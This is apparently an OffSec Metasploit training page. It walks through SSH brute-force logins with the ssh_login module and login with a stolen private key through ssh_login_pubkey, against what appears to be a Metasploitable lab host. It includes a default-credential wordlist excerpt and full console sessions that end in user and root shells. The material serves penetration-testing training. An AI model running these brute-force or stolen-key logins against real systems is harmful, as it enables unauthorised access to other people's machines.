Become a Partner
Add OffSec to your list of training providers
Partner with usThe ssh_login module is quite versatile in that it can not only test a set of credentials across a range of IP addresses, but it can also perform brute force login attempts. We will pass a file to the module containing usernames and passwords separated by a space as shown below.
root@kali:~# head /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
root
root !root
root Cisco
root NeXT
root QNX
root admin
root attack
root ax400
root bagabu
root blablabla
Next, we load up the scanner module in Metasploit and set USERPASS_FILE to point to our list of credentials to attempt.
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.154
RHOSTS => 192.168.1.154
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false
With everything ready to go, we run the module. When a valid credential pair is found, we are presented with a shell on the remote machine.
msf auxiliary(ssh_login) > run
[*] 192.168.1.154:22 - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2010-09-09 17:25:18 -0600
[+] 192.168.1.154:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...
id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login) >
Using public key authentication for SSH is highly regarded as being far more secure than using usernames and passwords to authenticate. The caveat to this is that if the private key portion of the key pair is not kept secure, the security of the configuration is thrown right out the window. If, during an engagement, you get access to a private SSH key, you can use the ssh_login_pubkey module to attempt to login across a range of devices.
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > show options
Module options (auxiliary/scanner/ssh/ssh_login_pubkey):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
KEY_PATH yes Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(ssh_login_pubkey) > set KEY_FILE /tmp/id_rsa
KEY_FILE => /tmp/id_rsa
msf auxiliary(ssh_login_pubkey) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login_pubkey) > set RHOSTS 192.168.1.154
RHOSTS => 192.168.1.154
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.1.154:22 - SSH - Testing Cleartext Keys
[*] 192.168.1.154:22 - SSH - Trying 1 cleartext key per user.
[*] Command shell session 1 opened (?? -> ??) at 2010-09-09 17:17:56 -0600
[+] 192.168.1.154:22 - SSH - Success: 'root':'57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login_pubkey) > sessions -i 1
[*] Starting interaction with 1...
ls
reset_logs.sh
id
uid=0(root) gid=0(root) groups=0(root)
exit
[*] Command shell session 1 closed.
msf auxiliary(ssh_login_pubkey) >